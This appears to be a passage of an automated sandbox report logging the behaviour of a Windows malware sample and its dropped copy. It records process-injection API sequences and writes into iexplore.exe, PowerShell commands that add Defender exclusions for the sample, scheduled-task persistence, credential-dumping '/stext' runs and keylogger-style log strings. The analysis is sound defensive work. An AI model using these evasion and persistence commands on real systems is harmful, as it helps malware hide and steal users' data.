                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,8_2_0041812A
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMemory written: C:\Users\user\Desktop\LdSbZG1iH6.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMemory written: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe protection: execute and read and write
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe protection: execute and read and write
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe protection: execute and read and write
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2D40008Jump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_00412132
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00419662 mouse_event,8_2_00419662
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Users\user\Desktop\LdSbZG1iH6.exe "C:\Users\user\Desktop\LdSbZG1iH6.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\xgyrrizik"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\ijdkrtkjyyuu"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\sdjcslvdtgmhffr"
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager\logs.dat
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Managerenh.dlltz~f
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910311868.0000000004B62000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager>g
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\stuvwx
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001732000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\B
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\=
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\{
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\|
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\er
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerger
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager\logs.dat6~"
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910311868.0000000004B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\s
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\er3
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\4
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\/
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\n
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, logs.dat.14.drBinary or memory string: [Program Manager]
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\e
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\&
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager292437dll
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager@gc
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager\logs.datn~J
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager\logs.datL~l
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Managerenh.dllF~r
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001732000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram ManagerX~x
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\P
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001732000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:S
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00434CB6 cpuid 8_2_00434CB6
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: EnumSystemLocalesW,8_2_0045201B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: EnumSystemLocalesW,8_2_004520B6
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00452143
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: GetLocaleInfoW,8_2_00452393
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: EnumSystemLocalesW,8_2_00448484
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_004524BC
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: GetLocaleInfoW,8_2_004525C3
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00452690
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: GetLocaleInfoW,8_2_0044896D
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: GetLocaleInfoA,8_2_0040F90C
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00451D58
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: EnumSystemLocalesW,8_2_00451FD0
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Users\user\Desktop\LdSbZG1iH6.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
